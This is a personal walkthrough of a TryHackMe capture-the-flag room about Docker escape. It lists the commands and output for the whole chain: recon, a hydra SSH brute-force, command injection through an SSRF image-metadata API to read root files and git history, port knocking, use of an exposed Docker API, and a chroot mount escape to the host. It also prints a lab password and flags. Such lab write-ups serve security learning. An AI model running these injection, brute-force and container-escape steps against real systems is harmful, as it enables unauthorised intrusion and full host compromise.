# Task 1 - Introduction

## Renaissance

IP : 10.10.0.75

nginx 1.19.6

using Nuxt and Docker 

Found 4 Javascript files running as script

Run Dirbuster and found `http://10.10.0.75/flags.php`

Run nmap to check for open ports

```
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh?
| fingerprint-strings: 
|   GenericLines: 
|_    d&FYg1}9R-/~];wO|1moPpM?
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    nginx 1.19.6
| http-robots.txt: 3 disallowed entries 
|_/api/ /exif-util /*.bak.txt$
|_http-server-header: nginx/1.19.6
|_http-title: docker-escape-nuxt 
|_http-trane-info: Problem with XML parsing of /evox/about

```

Running nmap wth tag -d to debug

Port 22 is open, running hydra with ssh

`hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.0.75`

 > got a timeout error


Run Gobuster with common.txt 

`gobuster dir -u http://10.10.0.75/ -w /usr/share/wordlists/dirb/common.txt -t 50 --wildcard
`

Results: 

```
===============================================================
2021/02/14 16:45:16 Starting gobuster
===============================================================
/_conf (Status: 200)
/.bash_history (Status: 200)
/.hta (Status: 200)
/_dev (Status: 200)
/.git/HEAD (Status: 200)
/.svn/entries (Status: 200)
/.mysql_history (Status: 200)
/.svn (Status: 200)
/.swf (Status: 200)
/_css (Status: 200)
/_config (Status: 200)
/api (Status: 301)
/.listings (Status: 200)
/.history (Status: 200)
/.perf (Status: 200)
/.forward (Status: 200)
/.htpasswd (Status: 200)
/.listing (Status: 200)
/AppsLocalLogin (Status: 200)
/contact-us (Status: 200)
/films (Status: 200)
/jsps (Status: 200)
/option (Status: 200)
/registrations (Status: 200)
/svr (Status: 200)
/wp-icludes (Status: 200)

```

Immune to SQL Injection

`/api (Status: 301)` > check the URL `<ip>/api`

`http://10.10.244.29/exif-util/` has something we can work with. We can upload file from machine or from URL 

Testing with an HTML file from machine returns 503 error

## Set up a URL with a photo to make sure that tha request comes thru

1) Get any image > I got `blue.png`> cp to /thegreatescape/uploads folder
2) run `python3 -m http.server` > this will run an HTTP server with my IP
3) navigate to `<my-ip>/blue.png` > your picture should be there
4) Navigate to `http://10.10.244.29/api/exif?url=http://10.6.31.49:8000/blue.png`
	- that first IP is the machine, the second one is mine

Returns the exif of my PNG! > That's good 

![exif](/Offensive-Security/TryHackMe/img/TheGreatEscape/exif.png)

It seems like we can only upload photos files > html does not work > photo classroom


## Found something

`10.10.174.186/exif-util.bak.txt` > there is a URL in there

`http://10.10.174.186/api/exif?url=http://api-dev-backup:8080/` 

passing in a param

`http://10.10.174.186/api/exif?url=http://api-dev-backup:8080/exif?url=--help`

>YES!!

let's check whoami

`http://10.10.174.186/api/exif?url=http://api-dev-backup:8080/exif?url=--help;whoami`

i AM ROOT YES

scroll to the bottom to see the output


`http://10.10.174.186/api/exif?url=http://api-dev-backup:8080/exif?url=--help;ls%20-la%20/root`

has dev-note.txt

`http://10.10.174.186/api/exif?url=http://api-dev-backup:8080/exif?url=;cat%20/root/dev-note.txt`


FOUND A PASSWROD

```
Hey guys,

Apparently leaving the flag and docker access on the server is a bad idea, or so the security guys tell me. I've deleted the stuff.

Anyways, the password is fluffybunnies123

Cheers,

Hydra
```

`http://10.10.174.186/api/exif?url=http://api-dev-backup:8080/exif?url=;cat%20/etc/hosts`
RETURNS 

VVV

```
127.0.0.1	localhost
::1	localhost ip6-localhost ip6-loopback
fe00::0	ip6-localnet
ff00::0	ip6-mcastprefix
ff02::1	ip6-allnodes
ff02::2	ip6-allrouters
192.168.112.2	api-dev-backup
```

http://10.10.99.215/api/exif?url=http://api-dev-backup:8080/exif?url=;cat%20-v%20/root/.gitconfig

Returns 

````
email = hydragyrum@example.com
	name = Hydra

````

checked git log

`http://10.10.99.215/api/exif?url=http://api-dev-backup:8080/exif?url=;%20git%20-C%20/root%20log`


```
commit 5242825dfd6b96819f65d17a1c31a99fea4ffb6a
Author: Hydra <hydragyrum@example.com>
Date:   Thu Jan 7 16:48:58 2021 +0000

    fixed the dev note

commit 4530ff7f56b215fa9fe76c4d7cc1319960c4e539
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Removed the flag and original dev note b/c Security

commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes


```

do a git show on that commit 

`http://10.10.99.215/api/exif?url=http://api-dev-backup:8080/exif?url=;%20git%20-C%20/root%20show%20a3d30a7d0510dc6565ff9316e3fb84434916dee8`

```


commit a3d30a7d0510dc6565ff9316e3fb84434916dee8
Author: Hydra <hydragyrum@example.com>
Date:   Wed Jan 6 20:51:39 2021 +0000

    Added the flag and dev notes

diff --git a/dev-note.txt b/dev-note.txt
new file mode 100644
index 0000000..89dcd01
--- /dev/null
+++ b/dev-note.txt
@@ -0,0 +1,9 @@
+Hey guys,
+
+I got tired of losing the ssh key all the time so I setup a way to open up the docker for remote admin.
+
+Just knock on ports 42, 1337, 10420, 6969, and 63000 to open the docker tcp port.
+
+Cheers,
+
+Hydra
\ No newline at end of file
diff --git a/flag.txt b/flag.txt
new file mode 100644
index 0000000..aae8129
--- /dev/null
+++ b/flag.txt
@@ -0,0 +1,3 @@
+You found the root flag, or did you?
+
+THM{0cb4b947043cb5c0486a454b75a10876}
\ No newline at end of file

```
found a root flag 


the note says to knock on the ports in sequence to get the docker port open

`./knock 10.10.99.215 42 1337 10420 6969 63000`

run nmap at port 2375 again to check 

`nmap -v 10.10.99.215 -p 2375`

## This website is great

https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124

I'm following the steps on this website

```
PORT     STATE SERVICE
2375/tcp open  docker

```

`curl http://10.10.99.215:2375/version`

```
{"Platform":{"Name":"Docker Engine - Community"},"Components":[{"Name":"Engine","Version":"20.10.2","Details":{"ApiVersion":"1.41","Arch":"amd64","BuildTime":"2020-12-28T16:15:09.000000000+00:00","Experimental":"false","GitCommit":"8891c58","GoVersion":"go1.13.15","KernelVersion":"4.15.0-130-generic","MinAPIVersion":"1.12","Os":"linux"}},{"Name":"containerd","Version":"1.4.3","Details":{"GitCommit":"269548fa27e0089a8b8278fc4fc781d7f65a939b"}},{"Name":"runc","Version":"1.0.0-rc92","Details":{"GitCommit":"ff819c7e9184c13b7c2607fe6c30ae19403a7aff"}},{"Name":"docker-init","Version":"0.19.0","Details":{"GitCommit":"de40ad0"}}],"Version":"20.10.2","ApiVersion":"1.41","MinAPIVersion":"1.12","GitCommit":"8891c58","GoVersion":"go1.13.15","Os":"linux","Arch":"amd64","KernelVersion":"4.15.0-130-generic","BuildTime":"2020-12-28T16:15:09.000000000+00:00"}


```


Check out Docker 

```
docker -H 10.10.99.215:2375 info
Client:
 Debug Mode: false

Server:
 Containers: 4
  Running: 4
  Paused: 0
  Stopped: 0
 Images: 27
 Server Version: 20.10.2
 Storage Driver: overlay2
  Backing Filesystem: extfs
  Supports d_type: true
  Native Overlay Diff: true
 Logging Driver: json-file
 Cgroup Driver: cgroupfs
 Plugins:
  Volume: local
  Network: bridge host ipvlan macvlan null overlay
  Log: awslogs fluentd gcplogs gelf journald json-file local logentries splunk syslog
 Swarm: inactive
 Runtimes: io.containerd.runc.v2 io.containerd.runtime.v1.linux runc
 Default Runtime: runc
 Init Binary: docker-init
 containerd version: 269548fa27e0089a8b8278fc4fc781d7f65a939b
 runc version: ff819c7e9184c13b7c2607fe6c30ae19403a7aff
 init version: de40ad0
 Security Options:
  apparmor
  seccomp
   Profile: default
 Kernel Version: 4.15.0-130-generic
 Operating System: Ubuntu 18.04.5 LTS
 OSType: linux
 Architecture: x86_64
 CPUs: 1
 Total Memory: 983.2MiB
 Name: great-escape.thm
 ID: FDCS:BLAR:AJNY:PW6Y:DVAY:R5IQ:VNLF:WRQ5:FP6Y:2IB5:U37T:3W6L
 Docker Root Dir: /var/lib/docker
 Debug Mode: false
 Registry: https://index.docker.io/v1/
 Labels:
 Experimental: false
 Insecure Registries:
  127.0.0.0/8
 Live Restore Enabled: false

WARNING: API is accessible on http://0.0.0.0:2375 without encryption.
         Access to the remote API is equivalent to root access on the host. Refer
         to the 'Docker daemon attack surface' section in the documentation for
         more information: https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface
WARNING: No swap limit support



```

`docker -H 10.10.99.215:2375 ps`

````

CONTAINER ID        IMAGE               COMMAND                  CREATED             STATUS              PORTS                  NAMES
49fe455a9681        frontend            "/docker-entrypoint.…"   5 weeks ago         Up About an hour    0.0.0.0:80->80/tcp     dockerescapecompose_frontend_1
4b51f5742aad        exif-api-dev        "./application -Dqua…"   5 weeks ago         Up About an hour                           dockerescapecompose_api-dev-backup_1
cb83912607b9        exif-api            "./application -Dqua…"   5 weeks ago         Up About an hour    8080/tcp               dockerescapecompose_api_1
548b701caa56        endlessh            "/endlessh -v"           5 weeks ago         Up About an hour    0.0.0.0:22->2222/tcp   dockerescapecompose_endlessh_1


````
Got into 

1) dockerescapecompose_api_1 
- Whoami > quarkus 
2) dockerescapecompose_frontend_1 
- Per the hint in first flag, there is a .well-known in front end
`root@docker-escape:/usr/share/nginx/html/.well-known# cat security.txt `

```
Hey you found me!

The security.txt file is made to help security researchers and ethical hackers to contact the company about security issues.

See https://securitytxt.org/ for more information.

Ping /api/fl46 with a HEAD request for a nifty treat.
root@docker-escape:/usr/share/nginx/html/.well-known# 
```
`root@kali-virtualbox:~# curl --head http://10.10.99.215/api/fl46`
````
HTTP/1.1 200 OK
Server: nginx/1.19.6
Date: Thu, 18 Feb 2021 02:50:20 GMT
Connection: keep-alive
flag: THM{b801135794bf1ed3a2aafaa44c2e5ad4}
````

3)dockerescapecompose_api-dev-backup_1 > dev_note_txt is the same as waht we we see 

# Last task
run this command to get Hydra as root

`docker -H 10.10.99.215:2375 run -v /:/mnt --rm -it alpine:3.9 chroot /mnt sh`

ok im in as Hydra 

````
# ls -la /root
total 24
drwx------  3 root root 4096 Jan  6 23:37 .
drwxr-xr-x 22 root root 4096 Jan  9 22:11 ..
lrwxrwxrwx  1 root root    9 Jan  6 18:22 .bash_history -> /dev/null
-rw-r-----  1 root root 3106 Apr  9  2018 .bashrc
drwxr-xr-x  3 root root 4096 Jan  6 23:35 .local
-rw-r-----  1 root root  148 Aug 17  2015 .profile
-rw-------  1 root root   74 Jan  6 23:37 flag.txt
# cat flag.txt	
cat: flag.txt: No such file or directory
# cd /root
# pwd
/root
# cat flag.txt	
Congrats, you found the real flag!
THM{c62517c0cad93ac93a92b1315a32d734}

````